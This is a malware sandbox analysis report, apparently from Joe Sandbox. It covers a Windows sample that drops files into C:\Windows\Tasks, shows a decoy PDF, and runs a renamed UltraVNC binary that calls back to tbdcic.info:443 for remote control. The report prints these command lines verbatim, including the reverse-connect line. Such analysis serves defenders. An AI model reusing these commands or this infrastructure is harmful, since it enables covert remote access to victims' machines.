MSVCRT.dll | ??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall
Language of compilation system | Country where language is spoken | Map
Russian | Russia |
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:38:24.300333023 CET | 49723 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:24.300388098 CET | 443 | 49723 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:24.300476074 CET | 49723 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:24.300689936 CET | 49723 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:24.300707102 CET | 443 | 49723 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:24.300780058 CET | 443 | 49723 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:24.411041975 CET | 49724 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:24.411091089 CET | 443 | 49724 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:24.411174059 CET | 49724 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:24.411286116 CET | 49724 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:24.411295891 CET | 443 | 49724 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:24.411354065 CET | 443 | 49724 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:41.226389885 CET | 49725 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:41.226433039 CET | 443 | 49725 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:41.226522923 CET | 49725 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:41.227459908 CET | 49725 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:41.227474928 CET | 443 | 49725 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:41.227519035 CET | 443 | 49725 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:41.362751961 CET | 49726 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:41.362798929 CET | 443 | 49726 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:41.362900019 CET | 49726 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:41.366161108 CET | 49726 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:41.366174936 CET | 443 | 49726 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:41.366220951 CET | 443 | 49726 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:52.833266020 CET | 49727 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:52.833329916 CET | 443 | 49727 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:52.833415031 CET | 49727 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:52.833596945 CET | 49727 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:38:52.833616018 CET | 443 | 49727 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:38:52.833662987 CET | 443 | 49727 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:39:15.342473030 CET | 49729 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:39:15.342518091 CET | 443 | 49729 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:39:15.342595100 CET | 49729 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:39:15.342761040 CET | 49729 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:39:15.342777014 CET | 443 | 49729 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:39:15.342838049 CET | 443 | 49729 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:39:49.170277119 CET | 49733 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:39:49.170310020 CET | 443 | 49733 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:39:49.170382977 CET | 49733 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:39:49.170588017 CET | 49733 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:39:49.170598984 CET | 443 | 49733 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:39:49.170640945 CET | 443 | 49733 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:40:33.938652992 CET | 49734 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:40:33.938688993 CET | 443 | 49734 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:40:33.938755989 CET | 49734 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:40:33.938865900 CET | 49734 | 443 | 192.168.2.8 | 194.190.152.201
Dec 23, 2024 13:40:33.938874960 CET | 443 | 49734 | 194.190.152.201 | 192.168.2.8
Dec 23, 2024 13:40:33.938925028 CET | 443 | 49734 | 194.190.152.201 | 192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:38:18.222908020 CET | 65278 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 13:38:24.053639889 CET | 64931 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 13:38:24.192847967 CET | 53 | 64931 | 1.1.1.1 | 192.168.2.8
Dec 23, 2024 13:38:37.315371990 CET | 60512 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 13:38:37.452665091 CET | 53 | 60512 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 13:38:18.222908020 CET | 192.168.2.8 | 1.1.1.1 | 0xd8e6 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:38:24.053639889 CET | 192.168.2.8 | 1.1.1.1 | 0x106c | Standard query (0) | tbdcic.info | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:38:37.315371990 CET | 192.168.2.8 | 1.1.1.1 | 0xf474 | Standard query (0) | tbdcic.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 13:38:18.443531036 CET | 1.1.1.1 | 192.168.2.8 | 0xd8e6 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 13:38:20.482588053 CET | 1.1.1.1 | 192.168.2.8 | 0x1d17 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:38:20.482588053 CET | 1.1.1.1 | 192.168.2.8 | 0x1d17 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:38:24.192847967 CET | 1.1.1.1 | 192.168.2.8 | 0x106c | No error (0) | tbdcic.info | | 194.190.152.201 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:38:37.452665091 CET | 1.1.1.1 | 192.168.2.8 | 0xf474 | No error (0) | tbdcic.info | | 194.190.152.201 | A (IP address) | IN (0x0001) | false

                                                                          Target ID:0
                                                                          Start time:07:38:04
                                                                          Start date:23/12/2024
                                                                          Path:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\T8xrZb7nBL.exe"
                                                                          Imagebase:0x400000
                                                                          File size:1'670'955 bytes
                                                                          MD5 hash:1677BD5B561B890396AE1816066CA481
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:9
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6ee680000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:10
                                                                          Start time:07:38:05
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:07:38:06
                                                                          Start date:23/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                                          Imagebase:0x7ff6e8200000
                                                                          File size:5'641'176 bytes
                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:12
                                                                          Start time:07:38:06
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:taskkill /f /im browser_sn.exe
                                                                          Imagebase:0x1e0000
                                                                          File size:74'240 bytes
                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:15
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:07:38:07
                                                                          Start date:23/12/2024
                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                          Imagebase:0x7ff79c940000
                                                                          File size:3'581'912 bytes
                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:18
                                                                          Start time:07:38:09
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:07:38:12
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:07:38:14
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:07:38:15
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 8
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:27
                                                                          Start time:07:38:23
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000000.1606181328.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:28
                                                                          Start time:07:38:23
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:29
                                                                          Start time:07:38:25
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 4
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:30
                                                                          Start time:07:38:29
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c "C:\Windows\Tasks\3889122.cmd"
                                                                          Imagebase:0xa40000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:31
                                                                          Start time:07:38:29
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 1
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:32
                                                                          Start time:07:38:30
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:taskkill /f /im browser_sn.exe
                                                                          Imagebase:0x1e0000
                                                                          File size:74'240 bytes
                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:33
                                                                          Start time:07:38:30
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 2
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:34
                                                                          Start time:07:38:32
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000022.00000000.1696757218.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          Has exited:false

                                                                          Target ID:35
                                                                          Start time:07:38:32
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 8
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:36
                                                                          Start time:07:38:40
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\Tasks\browser_sn.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                                                                          Imagebase:0x7ff6c2b80000
                                                                          File size:1'945'368 bytes
                                                                          MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000024.00000000.1776578444.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                          Has exited:true

                                                                          Target ID:37
                                                                          Start time:07:38:40
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 4
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:38
                                                                          Start time:07:38:44
                                                                          Start date:23/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 600
                                                                          Imagebase:0x320000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                            Execution Graph

                                                                            Execution Coverage:18.9%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:26.4%
                                                                            Total number of Nodes:1626
